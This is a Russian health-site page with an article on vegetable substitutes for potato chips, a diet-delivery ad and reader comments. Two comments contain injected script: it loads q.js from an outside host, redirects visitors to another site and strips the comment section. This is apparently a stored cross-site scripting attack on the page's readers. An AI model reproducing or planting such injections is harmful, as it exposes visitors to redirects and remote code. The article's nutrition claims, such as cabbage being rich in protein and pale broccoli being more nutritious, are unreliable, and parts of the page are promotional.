Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем заменить картофельные...  >>  Чем заменить картофельные чипсы
 
Обратная связь
 

Чем заменить картофельные чипсы

Размер шрифта
09 декабря 2013 00:00
  • google_analytics: false
  • Нравится

Чтобы похудеть нужно отказаться от такой еды, как картофельные чипсы! Но можно ли их заменить чем-то полезным, чтобы и худеть, и есть?

Чем заменить картофельные чипсы

Чипсы из капусты

Если вы еще не пробовали чипсы, приготовленные из капусты, то вы очень многое потеряли. Капуста – это суперпродукт, она богата белком, а также множеством полезных элементов, в которых нуждается ваш организм. Попробуйте запечь листки капусты с семенами кунжута и морской солью, и вы будете удивлены, почему вы тратили время на простые картофельные чипсы.

Запеченные чипсы из таро (колоказии)

Таро (или колоказия) – особенно популярный корнеплод в странах Азии и Африки, напоминает нечто среднее между кокосом и пастернаком. Таро содержит на 30% меньше жира и больше клетчатки, чем его близкий родственник – картофель. Также колоказия богата витамином E. Если запечь или слегка обжарить ломтики таро, то по вкусовым качествам, они не будут уступать картофельным. Зато насколько больше пользы!

Хрустящие чипсы из цукини с пармезаном

После сбора урожая у вас остались цукини, и вы не знаете, что с ними делать? Приготовьте из них вкусную закуску! Смажьте их яичным белком, обваляйте в панировочных сухарях, добавьте пармезан и чеснок. Поверьте, никто не сможет устоять перед такой закуской.  

Запеченные чипсы из брокколи

Брокколи обладает большим количеством питательных свойств, в том числе снижает холестерин, обеспечивает запасом витамина D и кемпферолом, который является противовоспалительным. Если брокколи бледная и мягкая, это говорит о том, что в ней содержится много питательных веществ, поэтому запекать брокколи – это отличная идея.

Чипсы без глютена

Если вы избегаете употребления пшеницы, даже некоторыми из вышеуказанных рецептов вы не сможете воспользоваться. Для приготовления альтернативной закуски используйте миндальное муку, цветки кокоса или другие компоненты без глютена. Такая закуска получится хрустящей и оригинальной на вкус.

Чипсы из редиса

Еще одной отличной альтернативой картофельным чипсам станут чипсы из редиса. Он богат фолиевой кислотой, витамином С и антоцианами – все эти полезные вещества могут снизить риск заболевания раком. Редис также обладает прекрасным острым вкусом, что делает его просто идеальной основой для чипсов.

Чипсы из сладкого картофеля

Если вы все же больше любите традиционные картофельные чипсы, то попробуйте заменить обычный картофель сладким. Чипсы, сделанные из батата, чуть слаще, чем привычные нам чипсы, к тому же батат – источник бета-каротина и витамина А.

Ну, а если вы хотите есть и худеть, то просто закажите «Диету Елены Малышевой» здесь! Уже готовая правильная еда будет доставлена в любое удобное для вас место и время! Вам останется только есть и РЕАЛЬНО худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

14 декабря 2013 в 21:18

Цитировать   |   Пожаловаться

Я любой вредный перекус заменяю спреем глукобрэйк. Брызгаю в рот вместо того, чтобы съесть конфету или те же чипсы, сразу желание проходит. В этом спрее содержится глюкоза, но в мизерной дозировке, поэтому чувство насыщения приходит сразу, а калорий и вреда организму нет. Вполне достойный способ поддержать себя во время диеты, мне хорошо помогает.

2 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

19 августа 2016 в 11:40

Цитировать   |   Пожаловаться

Здравствуйте!
Цитата:
"...Капуста – это суперпродукт, она богата белком...."
Скажите пожалуйста! Вот где Вы там нашли белок?
1-2 максимум 2 грамма из 100 !??
Это богатство?
Как можно верить всему остальному содержимому, в том числе передач?
При всём Уважении...!
Владислав

5 - Гость

26 августа 2016 в 07:18

Цитировать   |   Пожаловаться

Особенно миндальная мука и цветки кокоса у нас на каждом углу продаются))да еще таро)))

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Еда, которая заставляет вас ЕСТЬ
Еда в новый год: продукты-обманщинки
Как похудеть, ничего не делая

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.